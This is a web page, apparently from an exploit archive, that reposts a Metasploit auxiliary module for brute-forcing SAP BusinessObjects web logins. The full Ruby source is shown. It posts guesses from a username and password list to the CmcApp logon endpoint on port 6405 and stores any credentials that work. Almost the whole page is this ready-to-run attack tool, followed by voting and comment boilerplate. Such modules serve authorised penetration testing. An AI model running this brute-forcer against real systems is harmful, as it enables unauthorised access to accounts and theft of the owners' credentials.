SAP BusinessObjects Web User Bruteforcer

2024.09.01

Credit: Jay Turla

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'		   => 'SAP BusinessObjects Web User Bruteforcer',
      'Description'	=> 'This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.',
      'References'  =>
        [
          # General
          [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ]
        ],
      'Author'		 => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
      'License'		=> MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(6405),
      ])
    register_autofilter_ports([ 6405 ])
  end

  def run_host(ip)
    res = send_request_cgi({
      'uri'	 => "/PlatformServices/service/app/logon.object",
      'method'  => 'GET'
    }, 25)
    return if not res

    each_user_pass { |user, pass|
      enum_user(user,pass)
    }
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def enum_user(user, pass)
    vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' password: '#{pass}'")
    success = false
    data = 'isFromLogonPage=true&cms=127.0.1%3A6400'
    data << "&username=#{Rex::Text.uri_encode(user.to_s)}"
    data << "&password=#{Rex::Text.uri_encode(pass.to_s)}"
    data << '&authType=secEnterprise&backUrl=%2FApp%2Fhome.faces'
    begin
      res = send_request_cgi({
        'uri'		  => '/PlatformServices/service/app/logon.object',
        'data'		 => data,
        'method'	   => 'POST',
        'headers'	  =>
              {
                'Connection' => "keep-alive",
                'Accept-Encoding' => "gzip,deflate",
              },
      }, 45)
      return :abort if (!res or (res and res.code != 200))
      if(res.body.match(/Account Information/i))
        success = false
      else
        success = true
        success
      end

    rescue ::Rex::ConnectionError
      vprint_error("[SAP BusinessObjects] Unable to attempt authentication")
      return :abort
    end

    if success
      print_good("[SAP BusinessObjects] Successful login '#{user}' password: '#{pass}'")
      report_cred(
        ip: rhost,
        port: rport,
        service_name: 'sap-businessobjects',
        user: user,
        password: pass,
        proof: res.body
      )
      return :next_user
    else
      vprint_error("[SAP BusinessObjects] failed to login as '#{user}' password: '#{pass}'")
      return
    end
  end
end

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SAP BusinessObjects Web User Bruteforcer

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.